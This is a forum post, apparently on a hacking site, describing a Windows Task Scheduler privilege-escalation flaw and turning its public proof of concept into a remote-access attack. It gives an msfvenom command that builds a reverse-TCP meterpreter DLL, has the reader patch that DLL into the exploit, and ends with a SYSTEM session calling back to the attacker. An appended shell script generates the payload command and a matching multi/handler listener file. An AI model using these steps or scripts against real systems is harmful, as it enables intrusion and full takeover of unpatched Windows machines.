Windows privilege escalation 0day

Posted by enhackapt (Administrator, Staff member; joined Dec 10, 2024)
A function exported by the Task Scheduler service in Windows 10 does not verify the caller's permissions. A user with any level of privilege can obtain write permission on sensitive system files by calling this function, and thereby escalate privileges.

Scope of impact: Windows 10, Windows Server 2016. Yesterday the friends in the group reproduced it successfully. Some of them also tried it on Windows 8 and found that privilege escalation succeeded there too.


Preparation: download the POC, a Windows 10 image, Process Explorer and CFF Explorer.
POC: GitHub - SandboxEscaper/randomrepo: Repo for random stuff
Windows 10 ISO: msdn Download
Process Explorer: Process Explorer - Windows Sysinternals | Microsoft Docs
CFF Explorer: Explorer Suite - NTCore


First, open Notepad.

[image: Windows privilege escalation 0day HACKAPT-1.png]

Nothing looks different yet; now run the POC.

[image: Windows privilege escalation 0day HACKAPT-2.png]

A cmd.exe with child processes conhost.exe and notepad.exe has been spawned as SYSTEM!



In Kali, run (replacing IP and PORT with the Kali listener's address and port):
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > ka.dll

[image: PvFgQP.md.png]



Copy the generated ka.dll to the Windows 10 machine.

[image: Windows privilege escalation 0day HACKAPT-4.png]



Open ALPC-TaskSched-LPE.dll in CFF Explorer, replace it with the DLL generated by msfvenom, then save.

[image: Windows privilege escalation 0day HACKAPT-5.png]

[image: Windows privilege escalation 0day HACKAPT-6.png]



Start the listener (multi/handler) in Kali.

[image: Windows privilege escalation 0day HACKAPT-7.png]



Run the modified POC on Windows 10.

[image: Windows privilege escalation 0day HACKAPT-8.png]



Back in Kali, a meterpreter session has connected back, and it is running with SYSTEM privileges.

[image: Windows privilege escalation 0day HACKAPT-9.png]
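The Kali side of the procedure above (payload generation, listener, callback) is shown only as screenshots. As an added example that is not part of the original post or of SandboxEscaper's repo, the script below builds the exact msfvenom command line used above and writes a matching msfconsole resource file for the multi/handler listener, after validating LHOST and LPORT so that a typo does not silently produce a DLL that calls back to the wrong address. The file names ka.dll and handler.rc and the sample address 192.168.56.1:4444 are assumptions; nothing here runs msfvenom or msfconsole itself.

```shell
#!/bin/sh
# Added example (not from the original post): compose the msfvenom command for
# the 64-bit reverse-TCP meterpreter DLL and an msfconsole resource script for
# the matching handler. LHOST/LPORT are validated before anything is emitted.

# Return 0 if $1 is a dotted-quad IPv4 address with every octet in 0..255.
valid_ipv4() {
  echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
  old_ifs=$IFS
  IFS=.
  set -- $1            # split the address into its four octets
  IFS=$old_ifs
  for o in "$1" "$2" "$3" "$4"; do
    [ "$o" -le 255 ] || return 1
  done
  return 0
}

# Return 0 if $1 is a TCP port in 1..65535.
valid_port() {
  echo "$1" | grep -Eq '^[0-9]{1,5}$' || return 1
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the msfvenom command line used in the post. -o is msfvenom's own
# output option and is equivalent to the "> ka.dll" redirection above.
# Usage: msfvenom_cmd LHOST LPORT [outfile]
msfvenom_cmd() {
  lhost=$1; lport=$2; out=${3:-ka.dll}
  valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
  valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
  printf 'msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=%s LPORT=%s -f dll -o %s\n' \
    "$lhost" "$lport" "$out"
}

# Write an msfconsole resource script that starts multi/handler with the same
# payload, LHOST and LPORT, so the listener always matches the DLL.
# Usage: write_handler_rc LHOST LPORT [rcfile]; prints the file path.
write_handler_rc() {
  lhost=$1; lport=$2; rc=${3:-handler.rc}
  valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
  valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
  cat > "$rc" <<EOF
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j
EOF
  echo "$rc"
}

# Stand-alone usage: ./setup.sh 192.168.56.1 4444
# then run the printed msfvenom command and: msfconsole -q -r handler.rc
if [ "$#" -ge 2 ]; then
  msfvenom_cmd "$1" "$2" && write_handler_rc "$1" "$2"
fi
```

Running the printed msfvenom command produces ka.dll; `msfconsole -q -r handler.rc` starts the listener as a background job, which is what the "monitoring" screenshot above shows. `ExitOnSession false` keeps the handler listening if the first session dies, which matters here because the PoC's injected DLL runs inside a service process and a session can drop when that process is restarted.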
[image: Windows privilege escalation 0day HACKAPT-10.png]

[image: Windows privilege escalation 0day HACKAPT-11.png]